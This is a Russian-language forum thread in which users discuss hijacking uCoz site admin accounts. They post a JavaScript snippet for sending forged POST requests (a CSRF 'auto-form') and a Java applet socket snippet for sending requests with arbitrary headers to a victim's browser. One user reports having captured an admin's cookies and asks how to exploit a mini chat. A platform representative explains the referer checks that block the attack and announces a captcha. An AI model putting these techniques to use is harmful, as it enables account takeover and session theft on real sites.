Разор, не мог бы ты объяснить про ПОСТ с помощью ява скрипт? Я капнул в исходниках. Вот. На основе этого, мог бы ты сделать POST-запрос с помощью html и js? Я посмотрел твой код на 2 странице, но я плохо понял(
с учетом того что я тебе написал sendRequest("[email protected]"); а url - укажи action Вобшем создаешь скрипт файл, например, admin.js в нем PHP: function sendRequest(params)// в params переменые передоваемы в пост запросе { if(params!==""){ req=initXMLHTTPRequest(); if (req) { req.open("POST",url,true); req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); req.send(params);} } } function initXMLHTTPRequest() { var xRequest=null; if (window.XMLHttpRequest){ xRequest=new XMLHttpRequest(); } else if (window.ActiveXObject){ xRequest=new ActiveXObject ("Microsoft.XMLHTTP"); } return xRequest; } url="сдесь содержимое action, или если оно пустое или не указано адрес скрипта где форма находиться"; sendRequest("[email protected]");
Да, но открой сниффер и посмотри пакеты. При смене пароля данные отсылаются именно в multipart/form-data.
Ну, не стоит считать что если у тебя так то у других также, судя по пакетам которые отсылаються у меня то в фф именно application/x-www-form-urlencoded, в других не смотрел, может это зависит от браузера.
Какуна матата, я попробовал твой способ. У меня все равно ничего что то неполучается. Давай я зарегестрирую тебе сайт на UcoZ и ты сам попробуешь?
1. Кража куков модератора ничего не даст, потому что куки на другом компьютере работать не будут (если защита). 2. Сделать автоформу для того чтобы модератор изменил пароль админа не выйдет по 2 причинам: a) модератор не может менять пароли других пользователей b) при редактировании данных проверяется реферер (отключите передачу рефереров в опере и сами попробуйте свой профиль отредактировать). Чтобы в дальнейшем не возникало подобных тем и желаний создавать автоформы для подобных действий, после обновления системы uCoz, в форму редактирования профиля будет добавлена капча.... Благодарю за сотрудничество
суть не меняется, админ не сможет автоформу отправить чтобы изменить свой пароль... делается проверка реферера, в котором проверяется точный адрес страницы с которой можно редактировать...
с помошью флеш вроде можно менять одельно взятые заголовки, правдо только 8-7 версией flash он засланый казачек, бей его... шютка
Да еше один из вариантов - это использовать java Aplet, и если например соединение с сервером делать посредством Socket - то можно писать ЛЮБОЙ HTTP заголовок вот например так Socket socket = new Socket(host, port) ; BufferedReader reader = new BufferedReader( new InputStreamReader(socket.getlnputstream())); PrintWriter writer = new PrintWriter( socket.getOutputStream() ) ; writer.print('GET /ddd.php?key=ashgdhagsdhfjasfdfasdasdasdasd HTTP/1.1\r\nUser-Agent: Fuck Off\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nHost: www.test1.ru\r\nConnection: Close\r\n\r\n') ; writer.flush() ; socket.shutdownOutput(); String line; while((line = reader.readLine()) != null) socket.close() ; Но тут есть одно но, ip адресс откуда скачиваеться java applet должен совпадать с ip куда идет обрашения appleta, зато можно посылать запросы к любому хосту находяшимуся на даном ip, ведь сервер оличает к какому хосту мы обрашаемся по Host: HTTP заголовка, ну и естествено у жертвы должна присутствывать подержка java в браузере.
Попробуйте кто нибудь через мини чат пробиться... Я пока толком не знаю как составить запрос, сегодня пришли куки админа: REFERER: http://*****.ru/***.img QUERY: 58& AGENT: Opera/9.52 (Windows NT 5.1; U; MRA 5.3 (build 02560); ru) Буду пробовать ещё, но если кто знает, посоветуйте как написать код.